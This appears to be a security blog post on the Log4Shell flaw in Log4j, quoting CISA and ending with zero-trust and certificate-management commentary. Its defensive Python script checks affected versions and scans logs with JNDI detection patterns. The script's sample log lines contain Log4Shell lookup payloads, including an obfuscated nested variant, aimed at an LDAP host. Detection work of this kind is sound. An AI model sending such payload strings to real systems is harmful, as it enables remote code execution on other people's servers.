It has been a week since it was discovered that a recent version of a seemingly harmless open-source logging library called Log4j contained a critical information security vulnerability. Organizations were on their toes sending out security advisories, and product teams were trying all possible measures to develop remediation patches for the vulnerability.
What is Log4J, and why does it have all the technology firms worried?
“The Cybersecurity and Infrastructure Security Agency (CISA) and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as “Log4Shell.”
“Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated, remote actor could exploit this vulnerability to take control of an affected system.”
The vulnerability affects multiple versions of Log4j and the applications that depend on it. Organizations were urged to review and monitor the Apache Log4j Security Vulnerabilities webpage for updates and mitigation guidance.
Remediation of these vulnerabilities in products and services using affected versions of Log4j requires product users to implement security updates. Users of affected products and services should refer to the respective product vendors for security updates. CISA urged all vendors to take immediate steps to identify, mitigate, and update Log4j-affected products to the latest version. Vendors sent out advisories to all end users, strongly urging them to prioritize software updates.
What is the issue?
The vulnerability gives an attacker the opportunity to download and execute a malicious payload by submitting a carefully crafted request to a vulnerable system. When the application logs the attacker-supplied input and message lookup substitution is enabled, Log4j resolves the embedded lookup and loads arbitrary code from a remote Lightweight Directory Access Protocol (LDAP) server. Since many popular frameworks include Log4j, the severity of the impact multiplies.
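Two of the defender's first tasks follow directly from the text above: deciding which Log4j versions in an inventory fall inside the affected range CISA names (2.0-beta9 to 2.14.1), and spotting lookup strings that have arrived in logged request data. The script below is an added example, not code from the original post or from the Log4j project. It assumes web-server access logs in a common format where the source address is the first field, and it assumes the only nested lookups worth normalising are the lower/upper forms; the log lines are constructed samples using documentation addresses, not real traffic.

```python
import re
from typing import List, Tuple

# --- Part 1: affected-version check (range taken from the CISA text above) ---
AFFECTED_FLOOR = (2, 0, 0)    # 2.0-beta9, pre-release suffix stripped
AFFECTED_CEIL = (2, 14, 1)    # 2.14.1


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '2.14.1' or '2.0-beta9' into a (major, minor, patch) tuple.

    Pre-release suffixes (-beta9, -rc1) are dropped, so every 2.0 pre-release
    is treated as affected; that is the conservative choice for an inventory.
    """
    core = version.split("-", 1)[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def is_affected_version(version: str) -> bool:
    """True for 2.0-beta9 <= version <= 2.14.1; Log4j 1.x is outside this range."""
    return AFFECTED_FLOOR <= parse_version(version) <= AFFECTED_CEIL


# --- Part 2: spotting lookup strings in request logs ---
# Log4j resolves ${lower:x} / ${upper:x} before the outer lookup, so a scanner
# that only matches the literal text "${jndi:" misses nested forms. The
# normaliser collapses those two nested lookups first (assumption: these are
# the variants we care about; extend NESTED_LOOKUP for others).
NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)


def normalise(text: str) -> str:
    """Repeatedly replace ${lower:x}/${upper:x} with x until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = NESTED_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_lookups(line: str) -> List[str]:
    """Return the JNDI scheme(s), e.g. 'ldap', referenced by lookups in one line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalise(line))]


def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, source address, schemes) for each line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = find_lookups(line)
        if schemes:
            source_ip = line.split(" ", 1)[0]
            hits.append((number, source_ip, schemes))
    return hits


# Constructed sample lines (documentation addresses, not real traffic): two
# benign requests and two whose User-Agent carries a lookup string.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [13/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.5/a}"',
    '203.0.113.12 - - [13/Dec/2021:10:01:09 +0000] "GET /api/v1/items HTTP/1.1" 200 2048 "-" "${${lower:j}ndi:ldap://203.0.113.5/b}"',
    '203.0.113.13 - - [13/Dec/2021:10:01:12 +0000] "POST /search HTTP/1.1" 200 256 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for v in ("1.2.17", "2.0-beta9", "2.14.1", "2.15.0"):
        print(f"{v:>10}: affected={is_affected_version(v)}")
    for number, source_ip, schemes in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number} from {source_ip}: lookup scheme(s) {schemes}")
```

The version check is only as good as the inventory it runs over: Log4j is frequently bundled inside other JARs, so the version strings fed to it should come from a scan of dependency manifests and nested archives, not just from the top-level package list. The log scanner reports the scheme so that triage can distinguish LDAP callbacks from other JNDI providers, and a hit is a reason to check whether the receiving application actually ran an affected version with lookups enabled.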
CISA Director, Jen Easterly told industry leaders that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career.”
“We expect the vulnerability to be widely exploited by sophisticated actors, and we have limited time to take necessary steps to reduce the likelihood of damage,” she said of the Apache Log4j flaw. “An unauthenticated, remote execution vulnerability could allow an intruder to take over an affected device.”
Hundreds of millions of devices are likely to be affected, and it is going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, said Jay Gazlay of CISA’s vulnerability management office.
“There’s no single action that fixes this issue,” Gazlay said. It’s a mistake to think anyone is “going to be done with this in a week or two.”
Thoughts to ponder upon
Challenges give birth to innovations. Gartner’s Hype Cycle for identity and access management (IAM) 2021 emphasizes the maturation of innovations that deliver security, risk management, and business value for the customer and workforce IAM.
Abide by industry best practices when it comes to deploying open source in enterprise software
The risks associated with the deployment of open source are here to stay. This calls for a structured and well-defined policy to manage such risks efficiently. Information security personnel need to be careful and diligent when assessing such risks. All risk parameters need to be carefully documented, following industry best practices.
New security challenges in cloud adoption
Despite the rising trend, many organizations continue to be dissatisfied with their cloud adoptions. Whether moving to the cloud delivers the “desired operational agility” remains an open question. One of the most cited roadblocks to realizing cloud adoption success is, surprisingly, cloud security.
It’s not the cloud but the lack of understanding of the cloud security model that threatens cybersecurity and agility. Another misstep taken by most organizations is to extend their on-premises, perimeter-based security solutions to the cloud.
Organizations must rethink their cybersecurity approach to remove security issues from the cloud success equation. Instead of fixing the perimeter, organizations must reinforce machine identity management and implement a zero-trust framework to secure multicloud and hybrid cloud environments.
Zero Trust networks are the future
Identity is the new network perimeter, and verification of digital identities on your network is central to a zero-trust strategy. However, many organizations mistakenly assume that limiting verification to user identities is sufficient. A true zero-trust implementation relies upon certificates and key pairs to strengthen security and ensure device verification in addition to identity verification.
Companies adopting the zero-trust model start with segmentation, implementing privileged access management (PAM), multi-factor authentication (MFA), vulnerability and patch management, and security analytics. However, they miss out on one key area: managing machine identities through digital certificates and keys. This heavy focus on access controls ignores the risk of compromised encryption tunnels.
It’s clear that digital certificates contribute much to a zero-trust architecture, but there’s a real need for a managed solution with automation of the certificate lifecycle at its core. Hence, implementing a next-gen certificate lifecycle automation solution is a key initiative towards achieving a fully functional zero-trust model.